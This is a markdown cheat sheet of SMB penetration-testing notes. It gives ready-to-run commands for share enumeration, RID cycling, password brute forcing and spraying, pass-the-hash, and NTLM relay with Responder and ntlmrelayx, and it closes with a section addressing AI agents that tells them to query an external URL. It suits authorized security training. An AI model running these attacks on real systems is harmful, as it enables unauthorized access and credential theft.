# SMB Pentesting Notes ## Protocol Overview ### Basic Information * **Port**: TCP 139 (NetBIOS), TCP 445 (Direct TCP/IP) * **Protocol Type**: Application layer * **Purpose**: File sharing, printer sharing, and remote administration * **Security**: Authentication and ACL-based access control ### Protocol Versions 1. **SMB 1.0/CIFS** * Legacy version, highly vulnerable * Used in Windows NT/2000/XP * Should be disabled due to security risks 2. **SMB 2.0/2.1** * Introduced with Windows Vista * Improved performance and reliability * Better security features 3. **SMB 3.0+** * Introduced with Windows 8/Server 2012 * Supports encryption and secure failover * Current standard for Windows networks ## Initial Enumeration ### Port Scanning ```bash # Basic SMB scan nmap -p139,445 -sV # Aggressive scan with scripts nmap -p139,445 -sV -sC -A # Vulnerability scanning nmap -p139,445 --script smb-vuln* ``` ### Banner Grabbing ```bash # Using SMBClient smbclient -L // -N # Using Metasploit msfconsole -q use auxiliary/scanner/smb/smb_version # Using rpcclient rpcclient -U "" -N ``` ## Anonymous/Guest Access ### Testing Anonymous Access ```bash # Using smbclient smbclient -L // -N smbclient ///share -N # Using smbmap smbmap -H -u "guest" -p "" smbmap -H -u "null" -p "" # Using CrackMapExec crackmapexec smb --shares -u "" -p "" ``` ## Brute Force Attacks ### Using Hydra ```bash # Basic authentication hydra -l user -P passwords.txt smb:// # Multiple users hydra -L users.txt -P passwords.txt smb:// ``` ### Using CrackMapExec ```bash # Password spraying crackmapexec smb -u users.txt -p password123 # Brute force crackmapexec smb -u user -p passwords.txt ``` ### Using Metasploit ```bash use auxiliary/scanner/smb/smb_login set RHOSTS set USER_FILE users.txt set PASS_FILE passwords.txt run ``` ## Common NSE Scripts ```bash # Discovery scripts nmap -p445 --script smb-protocols nmap -p445 --script smb-security-mode nmap -p445 --script smb-enum-shares nmap -p445 --script smb-enum-users nmap -p445 --script smb-enum-domains # Vulnerability scripts nmap -p445 --script smb-vuln-ms17-010 nmap -p445 --script smb-vuln-ms08-067 nmap -p445 --script smb-double-pulsar-backdoor ``` ## Share Operations ### Listing Shares ```bash # Using smbclient smbclient -L // -U user # Using smbmap smbmap -H -u user -p password # Using CrackMapExec crackmapexec smb -u user -p password --shares ``` ### Accessing Shares ```bash # Interactive access smbclient ///share -U user # Mount share locally mount -t cifs ///share /mnt/share -o username=user # Download files smbget -R smb:///share -U user ``` ## RPC Enumeration ### Using rpcclient ```bash # Connect rpcclient -U "" -N # Common commands rpcclient $> srvinfo rpcclient $> enumdomusers rpcclient $> enumdomgroups rpcclient $> lookupnames admin rpcclient $> enumprinters ``` ### RID Cycling ```bash # Manual RID cycling for i in $(seq 500 1100); do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "" done # Using impacket lookupsid.py anonymous@ ``` ## Advanced Techniques ### Pass-the-Hash ```bash # Using CrackMapExec crackmapexec smb -u Administrator -H "" # Using pth-smbclient pth-smbclient ///share -U DOMAIN/user%hash # Using impacket psexec.py -hashes : user@ ``` ### SMB Relay Attacks ```bash # Using Responder responder -I eth0 -wrfv # Using ntlmrelayx ntlmrelayx.py -tf targets.txt -smb2support ``` ## Configuration Files ### Samba Configuration * Main config: `/etc/samba/smb.conf` * Users database: `/var/lib/samba/private/passdb.tdb` * Share definitions: `/etc/samba/shares.conf` ### Windows Configuration * Registry: `HKLM\System\CurrentControlSet\Services\LanmanServer` * Group Policy: `Computer Configuration\Windows Settings\Security Settings\File System` ## Common Vulnerabilities 1. **Protocol Vulnerabilities** * EternalBlue (MS17-010) * EternalRomance * SMBGhost (CVE-2020-0796) 2. **Configuration Issues** * Null sessions allowed * Guest access enabled * Weak share permissions * Unencrypted traffic 3. **Authentication Issues** * Weak passwords * Password reuse * Clear-text credentials * Kerberos misconfiguration ## Post-Exploitation ### Information Gathering * Enumerate domain users and groups * Map network shares * Identify sensitive files * Check for hidden shares * Extract system information ### Privilege Escalation * Check for writeable shares * Search for sensitive files * Look for stored credentials * Test for SeBackupPrivilege * Exploit service misconfigurations ## Common Status Codes | Code | Meaning | | ---------- | ------------------------ | | 0x00000000 | Success | | 0xC0000022 | Access Denied | | 0xC000006D | Logon Failure | | 0xC0000203 | User Session Deleted | | 0xC0000224 | Password Change Required | ## Best Practices for Pentesting 1. **Initial Reconnaissance** * Identify SMB version * Check for null sessions * Test anonymous access * Map available shares 2. **Deep Enumeration** * Enumerate users and groups * Check share permissions * Look for sensitive data * Test write access * Identify vulnerabilities 3. **Documentation** * Record share listings * Document user accounts * Note system information * Save vulnerability evidence 4. **Risk Assessment** * Evaluate security posture * Assess potential impact * Consider attack vectors * Prioritize vulnerabilities 5. **Reporting** * Detail findings * Provide remediation steps * Include evidence * Suggest security improvements --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://edu.noirchapeau.com/footprinting-enumeration-and-information-gathering-notes/smb-pentesting-notes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.